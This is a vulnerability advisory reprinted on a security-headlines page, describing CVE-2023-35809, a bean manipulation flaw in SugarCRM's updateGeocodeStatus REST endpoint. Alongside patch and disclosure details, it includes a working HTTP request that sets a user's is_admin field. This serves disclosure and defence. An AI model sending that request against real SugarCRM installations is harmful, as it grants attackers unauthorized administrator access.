Security
Headlines
HeadlinesLatestCVEs

Headline

SugarCRM 12.2.0 Bean Manipulation

SugarCRM versions 12.2.0 suffer from a bean manipulation vulnerability that can allow for privilege escalation.

Packet Storm
#vulnerability#web#js#oauth#auth
------------------------------------------------------------------------SugarCRM <= 12.2.0 (updateGeocodeStatus) Bean Manipulation Vulnerability------------------------------------------------------------------------[-] Software Link:https://www.sugarcrm.com[-] Affected Versions:Version 12.2.0 and prior versions.Version 12.0.2 and prior versions.Version 11.0.5 and prior versions.[-] Vulnerability Description:The vulnerability is exploitable through the "/maps/updateGeocodeStatus" REST APIendpoint. This might allow a malicious user to modify arbitrary Sugar Beans, and thatcould lead to a variety of security impacts, such as Privilege Escalation attacks bysending an HTTP request like the following:POST /rest/v11_17/maps/updateGeocodeStatus HTTP/1.1Host: sugarcrm_websiteContent-Type: application/jsonOAuth-Token: d4cd573b-3b24-44ae-8eab-6d3b525f7974Content-Length: 96Connection: close{"id":"[USER_ID]","module":"Users","fieldName":"is_admin","status":1}[-] Solution:Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.[-] Disclosure Timeline:[14/02/2023] - Vendor notified[12/04/2023] - Fixed versions released[17/06/2023] - CVE number assigned[23/08/2023] - Publication of this advisory[-] CVE Reference:The Common Vulnerabilities and Exposures project (cve.mitre.org)has assigned the name CVE-2023-35809 to this vulnerability.[-] Credits:Vulnerability discovered by Egidio Romano.[-] Original Advisory:http://karmainsecurity.com/KIS-2023-06[-] Other References:https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-007/

Related news

CVE-2023-35809: sa-2023-007 - SugarCRM Support Site

An issue was discovered in SugarCRM Enterprise before 11.0.6 and 12.x before 12.0.3. A Bean Manipulation vulnerability has been identified in the REST API. By using a crafted request, custom PHP code can be injected through the REST API because of missing input validation. Regular user privileges can be used to exploit this vulnerability. Editions other than Enterprise are also affected.

Packet Storm: Latest News

ABB Cylon Aspect 3.07.02 user.properties Default Credentials